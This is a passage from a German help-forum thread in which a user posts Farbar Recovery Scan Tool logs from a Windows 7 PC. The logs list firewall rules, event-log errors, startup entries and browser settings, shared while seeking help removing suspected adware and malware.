(x86)\iTunes\iTunes.exe FirewallRules: [{720D02FF-52F6-4154-A621-5AB2A3DB03A3}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{C7AF308F-8BD1-41D4-A681-37A1C88C993A}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: 
[{10736636-FB53-42C9-A3F4-529BAFEF521E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{750C88E5-8449-4ED6-87F6-6F9A40C73F22}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{72A3B8D8-259B-478D-8EA1-E3F979D8CA18}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{81B1EC25-555A-4F2F-9395-9FD97F51323B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{2C423E45-FD79-468B-B116-1FC2C2477842}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{DA81D9C0-E7D2-4027-B0A5-A8A45C00F77D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{521249EF-E21D-4C4E-8C32-FDD3F208B733}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{89E0E88B-D4E4-491D-A414-02FCD1F3D197}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{1C8A9419-FD22-4DAA-A57C-F115A281A979}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{8B608DD6-21BB-4A2E-8800-E7106712C6F0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{A1CF8413-A121-4594-8D4F-822D997AD1F7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{78D1B940-9035-4A6C-BF79-C39436D455B2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{9FD597A8-5DF3-405B-BF40-DAD0B4A3D331}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: [{33EBB500-8307-46EF-8E6E-4044649E5550}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: 
[{B2E37F34-F81A-4758-AE8C-6350303ED76A}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{F8A57BC5-5370-4537-AD73-18A47D9490BA}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{396CE83B-463E-4ABD-9DDF-3AAF00CF8FC2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{55CF9D3A-CEA1-4EE1-9710-588133F87671}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{257241F5-DB72-4BCC-966A-EB960C45A132}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{B075E0A7-AA0A-476A-8E74-51E6DE493C7A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{FECE91C7-34A5-4011-ACE9-0C45BCC3E776}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{4F4A4AF0-A162-4CDE-A55E-56F506AF9332}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{E2340314-D830-445B-ACFE-84B2490E2D2B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{6E566919-5331-43A5-85E4-7B72D59CEE97}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{C86938D2-4623-4413-8927-C89AAE8215B2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{CAB95473-AE42-4A88-A6CD-2019753F6D1F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{8A3B2F36-312E-4CF7-A10A-E8D05CB2FD24}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{707E083B-17A4-43B5-A25F-F911B7A2478B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{D466720C-AE72-408E-81DB-EF107F94C734}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{875B4892-FDD1-4915-BE18-3D04DCB57C60}] => (Allow) C:\Program Files 
(x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{2BCB0DB0-2EB2-4F78-8EEE-6E29EE0C7CFD}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: [{FCF89AD8-A839-4426-A4C5-771A89F905E3}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: [{9B5F71A5-ACE5-483E-8E24-4F704CB2BD56}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [{165D76C1-CFCF-4A31-95F2-57AD4831602B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [TCP Query User{11D72B15-04AE-4224-98D0-4E863D33585C}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [UDP Query User{1E3DB40B-BE9E-42A4-8A07-6F1460C15F3A}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [TCP Query User{99D93149-D86B-4104-94D4-75AB15AAEBB6}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [UDP Query User{32F3CAD3-4F49-4157-A353-BC565EEB431F}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [{1AFD0420-A3E2-4D4C-89BF-9175F1E06A0C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{48969429-133A-4C3A-96AA-517EE6CD1645}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe FirewallRules: [{FBEF1CE7-BE0B-4061-BD5F-A3965CC65AD6}] => (Allow) D:\Verkauf\powerpoint\Office15\outlook.exe ==================== Fehlerhafte Geräte im Gerätemanager ============= Konnte Geräte nicht auflisten. Überprüfen Sie den "winmgmt" Dienst oder reparieren Sie den WMI. 
==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (09/20/2015 12:59:42 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"1". Die abhängige Assemblierung "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (09/19/2015 10:46:13 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: Lavasoft.SearchProtect.WinService.exe, Version: 1.0.0.0, Zeitstempel: 0x5575d81f Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bdfe0 Ausnahmecode: 0xe0434f4d Fehleroffset: 0x000000000000aa7d ID des fehlerhaften Prozesses: 0x1a14 Startzeit der fehlerhaften Anwendung: 0xLavasoft.SearchProtect.WinService.exe0 Pfad der fehlerhaften Anwendung: Lavasoft.SearchProtect.WinService.exe1 Pfad des fehlerhaften Moduls: Lavasoft.SearchProtect.WinService.exe2 Berichtskennung: Lavasoft.SearchProtect.WinService.exe3 Error: (09/19/2015 04:07:14 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT-AUTORITÄT) Description: Fehler beim Beenden einer Windows Installer-Transaktion: PROPLUS. Fehler 1603 beim Beenden der Transaktion. Error: (09/19/2015 03:43:00 PM) (Source: MsiInstaller) (EventID: 11713) (User: KennyG-PC) Description: Product: Microsoft PowerPoint MUI (English) 2013 -- Error 1713. Setup cannot install one of the required products for Microsoft PowerPoint MUI (English) 2013. Error: (09/19/2015 03:37:40 PM) (Source: ESENT) (EventID: 215) (User: ) Description: WinMail (5048) WindowsMail0: Die Sicherung wurde abgebrochen, weil sie vom Client angehalten wurde, oder weil die Verbindung mit dem Client unterbrochen wurde. 
Error: (09/19/2015 12:44:19 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT-AUTORITÄT) Description: Fehler beim Beenden einer Windows Installer-Transaktion: PROPLUS. Fehler 1603 beim Beenden der Transaktion. Error: (09/19/2015 12:33:11 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT-AUTORITÄT) Description: Fehler beim Beenden einer Windows Installer-Transaktion: PROPLUS. Fehler 1603 beim Beenden der Transaktion. Error: (09/19/2015 12:15:54 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: dnsridgewood.exe, Version: 1.0.0.0, Zeitstempel: 0x55c751a5 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bdfe0 Ausnahmecode: 0xe0434352 Fehleroffset: 0x000000000000aa7d ID des fehlerhaften Prozesses: 0x1bf0 Startzeit der fehlerhaften Anwendung: 0xdnsridgewood.exe0 Pfad der fehlerhaften Anwendung: dnsridgewood.exe1 Pfad des fehlerhaften Moduls: dnsridgewood.exe2 Berichtskennung: dnsridgewood.exe3 Error: (09/19/2015 12:15:49 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Anwendung: dnsridgewood.exe Frameworkversion: v4.0.30319 Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet. 
Ausnahmeinformationen: System.Runtime.InteropServices.COMException Stapel: bei System.Management.ManagementScope.Initialize() bei System.Management.ManagementObject.Initialize(Boolean) bei System.Management.ManagementClass.GetInstances(System.Management.EnumerationOptions) bei GreenTeamDNS.TcpIPWMI.setDNS(System.String, System.String) bei GreenTeamDNS.App.setProtectionLevel(Int32, Boolean) bei GreenTeamDNS.App.OnStartup(System.Windows.StartupEventArgs) bei System.Windows.Application.<.ctor>b__1(System.Object) bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) bei MS.Internal.Threading.ExceptionFilterHelper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.Dispatcher.WrappedInvoke(System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.DispatcherOperation.InvokeImpl() bei System.Threading.ExecutionContext.runTryCode(System.Object) bei System.Runtime.CompilerServices.RuntimeHelpers.ExecuteCodeWithGuaranteedCleanup(TryCode, CleanupCode, System.Object) bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) bei System.Windows.Threading.DispatcherOperation.Invoke() bei System.Windows.Threading.Dispatcher.ProcessQueue() bei System.Windows.Threading.Dispatcher.WndProcHook(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) bei MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) bei MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object) bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) bei MS.Internal.Threading.ExceptionFilterHelper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) bei 
System.Windows.Threading.Dispatcher.WrappedInvoke(System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.Dispatcher.InvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32) bei MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr) bei MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef) bei System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame) bei System.Windows.Application.RunInternal(System.Windows.Window) bei System.Windows.Application.Run() bei GreenTeamDNS.App.Main() Error: (09/18/2015 09:59:25 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 9765 Systemfehler: ============= Error: (09/20/2015 07:30:31 PM) (Source: Service Control Manager) (EventID: 7024) (User: ) Description: Der Dienst "AVGIDSAgent" wurde mit folgendem dienstspezifischem Fehler beendet: %%-536753635. Error: (09/20/2015 06:25:40 PM) (Source: Service Control Manager) (EventID: 7003) (User: ) Description: Der Dienst "Sicherheitscenter" ist von folgendem Dienst abhängig: Winmgmt. Dieser Dienst ist eventuell nicht installiert. Error: (09/20/2015 06:23:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "IE Search Set" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (09/20/2015 06:23:17 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "LavasoftTcpService" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (09/20/2015 06:23:17 PM) (Source: Service Control Manager) (EventID: 7003) (User: ) Description: Der Dienst "IP-Hilfsdienst" ist von folgendem Dienst abhängig: Winmgmt. Dieser Dienst ist eventuell nicht installiert. 
Error: (09/20/2015 06:23:17 PM) (Source: Service Control Manager) (EventID: 7003) (User: ) Description: Der Dienst "CyberGhost 5 Client Service" ist von folgendem Dienst abhängig: Winmgmt. Dieser Dienst ist eventuell nicht installiert. Error: (09/20/2015 06:21:44 PM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler: %%1056 Error: (09/20/2015 06:21:13 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "Windows Presentation Foundation-Schriftartcache 3.0.0.0" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Neustart des Diensts. Error: (09/20/2015 06:21:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "Disc Soft Lite Bus Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error: (09/20/2015 06:21:12 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "Windows Search" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts. CodeIntegrity: =================================== Date: 2015-09-09 00:48:00.156 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.111 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. 
Date: 2015-09-09 00:48:00.054 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.010 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.933 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.879 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.840 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.785 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-08-31 13:46:58.975 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. 
Date: 2015-08-31 13:46:58.935 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. ==================== Speicherinformationen =========================== Prozessor: AMD Athlon(tm) 64 X2 Dual Core Processor 4600+ Prozentuale Nutzung des RAM: 58% Installierter physikalischer RAM: 4094.49 MB Verfügbarer physikalischer RAM: 1705.98 MB Summe virtueller Speicher: 8187.13 MB Verfügbarer virtueller Speicher: 5521.21 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:186.31 GB) (Free:67.6 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)] Drive d: (Data) (Fixed) (Total:698.63 GB) (Free:483.76 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 186.3 GB) (Disk ID: 500D500D) Partition 1: (Active) - (Size=186.3 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (MBR Code: Windows XP) (Size: 698.6 GB) (Disk ID: 7F4B721C) Partition 1: (Not Active) - (Size=698.6 GB) - (Type=07 NTFS) ==================== Ende von Addition.txt ============================ Edited by Zympop (20.09.2015 at 19:24) |
20.09.2015, 19:12 | #2 |
| Malware-gen, Adware-gen ... etc. FRST
Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:15-09-2015 durchgeführt von Kenny G (Administrator) auf KENNYG-PC (20-09-2015 19:34:14) Gestartet von C:\Users\Kenny G\Downloads Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium) Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 8 (Standard-Browser: FF) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe () C:\Windows\SysWOW64\PnkBstrA.exe () C:\Program Files (x86)\Could not connect. 
Error code = 0x-1442657579---\knsl4AC.tmpfs (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe (Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgfws.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcfgex.exe ==================== Registry (Nicht auf der Ausnahmeliste) =========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [Nvtmru] => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe [1028384 2013-10-18] (NVIDIA Corporation) HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3775912 2015-08-24] (AVG Technologies CZ, s.r.o.) 
HKLM-x32\...\Run: [TrojanScanner] => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [3716624 2015-08-31] (Simply Super Software) HKLM Group Policy restriction on software: C:\Program Files\BitDefender <====== ACHTUNG HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd) HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize HKU\S-1-5-18\...\Run: [Bitdefender-Geldbörse-Agent] => "C:\Program Files\Bitdefender\Bitdefender\pmbxag.exe" HKU\S-1-5-18\...\Run: [Bitdefender-Geldbörse] => "C:\Program Files\Bitdefender\Bitdefender\pwdmanui.exe" --hidden --nowizard HKU\S-1-5-18\...\Run: [Bitdefender-Geldbörse-Anwendungs-Agent] => "C:\Program Files\Bitdefender\Bitdefender\antispam32\bdapppassmgr.exe" SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation) SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation) ShellIconOverlayIdentifiers: [0WualaOverlayIcon1] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon2] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon3] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon4] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => 
C:\Windows\System32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers-x32: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\SysWow64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) Startup: C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopnotes.lnk [2014-08-30] GroupPolicyUsers\S-1-5-21-682121585-3582832733-1082443493-1008\User: Beschränkung <======= ACHTUNG ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) 
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{3B1D22AF-F97D-45ED-B09F-5CAD2B93F90B}: [DhcpNameServer] 192.168.2.1 Internet Explorer: ================== HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-682121585-3582832733-1082443493-1007\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation) Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Keine Datei Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies) Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation) Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation) Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation) Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft 
Corporation) FireFox: ======== FF ProfilePath: C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/ FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-11] () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-11] () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2013-10-01] () FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 -> C:\Program Files 